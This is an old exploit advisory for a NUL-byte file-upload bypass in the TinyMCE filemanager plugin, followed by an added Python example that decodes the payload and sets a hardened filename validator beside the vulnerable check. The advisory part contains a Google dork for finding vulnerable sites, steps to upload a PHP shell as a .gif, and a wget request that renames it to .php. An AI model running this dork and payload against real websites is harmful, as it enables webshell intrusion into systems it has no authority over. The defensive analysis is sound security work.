==============================================
File Upload Vulnerability [ Plugins tiny_mce ]
==============================================

http://tinymce.moxiecode.com/plugins_filemanager.php

Major version 3
Minor version 2.2.3

####################################################################
Author : Vladimir Vorontsov
Contact: d0znpp [at] gmail [dot] com
Greetz : GNU
My Group : ONSEC Russian Security Team
####################################################################

[~] DORK: inurl:/tiny_mce/plugins/filemanager/

--------------------------------------------------------------------

[~] Go to:
    http://web.com/tiny_mce/plugins/filemanager/pages/fm/index.html

[~] Upload the shell: a file with PHP content and a .gif extension, for example a.gif

[~] Rename it to .php through the filemanager's fm.moveFiles JSON-RPC method.
    The new name carries a NUL byte (%00) after ".php", so the string still ends
    in ".gif" when the extension is checked, but the NUL terminates the name when
    it reaches the filesystem call (PHP's file functions behaved this way before
    5.3.4), and the file is stored as a.php:

$ wget --post-data="json_data=%7B%22method%22%3A%22fm.moveFiles%22%2C%22params%22%3A%5B%7B%22frompath0%22%3A%22%7B0%7D%2Fimages%2F *a.gif*%22%2C%22toname0%22%3A%22*a.php%00.gif*%22%7D%5D%2C%22id%22%3A%22c0%22%7D" http://web.com/tiny_mce/plugins/filemanager/rpc/index.php

    The json_data parameter decodes to (the asterisks only mark the filenames
    in the original and are not part of the payload):

    {"method":"fm.moveFiles","params":[{"frompath0":"{0}/images/a.gif","toname0":"a.php\0.gif"}],"id":"c0"}

####################################################################
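The following is an added example, not code from the advisory or from the TinyMCE filemanager plugin. It decodes the advisory's fm.moveFiles request (reproduced here with the emphasis asterisks removed), models the extension check that lets "a.php\0.gif" through together with a NUL-truncating filesystem call, and puts a hardened target-name validator beside it. The function names, the ALLOWED whitelist and the truncation model are assumptions made for illustration.

```python
"""
Added example: the null-byte rename bypass from the advisory and a hardened
check for a rename/move endpoint. Nothing here is the plugin's own code; the
validators and the C-string truncation model are illustrative assumptions.
"""
import json
import os
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed after the advisory's wget payload (asterisks removed). The raw
# %00 inside "toname0" is the whole trick.
POST_BODY = (
    "json_data=%7B%22method%22%3A%22fm.moveFiles%22%2C%22params%22%3A"
    "%5B%7B%22frompath0%22%3A%22%7B0%7D%2Fimages%2Fa.gif%22%2C"
    "%22toname0%22%3A%22a.php%00.gif%22%7D%5D%2C%22id%22%3A%22c0%22%7D"
)

# Assumed whitelist of image extensions the upload dialog would accept.
ALLOWED = {".gif", ".jpg", ".jpeg", ".png"}


def decode_rpc(body: str) -> dict:
    """Return the JSON-RPC request from the form body, keeping the NUL byte."""
    json_text = parse_qs(body)["json_data"][0]
    # strict=False: the payload carries a raw control byte inside a string,
    # which a lenient server-side JSON parser would also accept.
    return json.loads(json_text, strict=False)


def naive_extension_ok(name: str) -> bool:
    """Vulnerable check: trusts whatever follows the last dot of the string."""
    return "." + name.rsplit(".", 1)[-1].lower() in ALLOWED


def c_string(name: str) -> str:
    """Model of a NUL-terminating filesystem API (PHP file functions < 5.3.4)."""
    return name.split("\x00", 1)[0]


def vulnerable_rename_target(name: str) -> Optional[str]:
    """Name that lands on disk when the naive check precedes a C-string call."""
    if not naive_extension_ok(name):
        return None
    return c_string(name)


def hardened_rename_target(name: str) -> Optional[str]:
    """Accept only a plain basename with exactly one whitelisted extension.

    Rejects control bytes (including NUL), path separators, traversal names,
    and secondary extensions such as a.php.gif that some web servers map to
    a handler anyway. Returns the name as it will be stored, or None.
    """
    if re.search(r"[\x00-\x1f\x7f/\\]", name) or name in {"", ".", ".."}:
        return None
    base = os.path.basename(name)
    stem, ext = os.path.splitext(base)
    if not stem or "." in stem or ext.lower() not in ALLOWED:
        return None
    # The validated string is exactly what reaches the filesystem.
    assert c_string(base) == base
    return base


def compare(body: str) -> dict:
    """Run both validators over the toname0 of a captured request."""
    target = decode_rpc(body)["params"][0]["toname0"]
    return {
        "requested": target,
        "vulnerable_stores": vulnerable_rename_target(target),
        "hardened_stores": hardened_rename_target(target),
    }


if __name__ == "__main__":
    for k, v in compare(POST_BODY).items():
        print(f"{k:>18}: {v!r}")
```

Running the block shows the requested name `'a.php\x00.gif'`, the vulnerable path storing `'a.php'`, and the hardened path refusing the rename. The hardened validator deliberately checks the final stored basename rather than the attacker-supplied string, which is the property the original endpoint lacked.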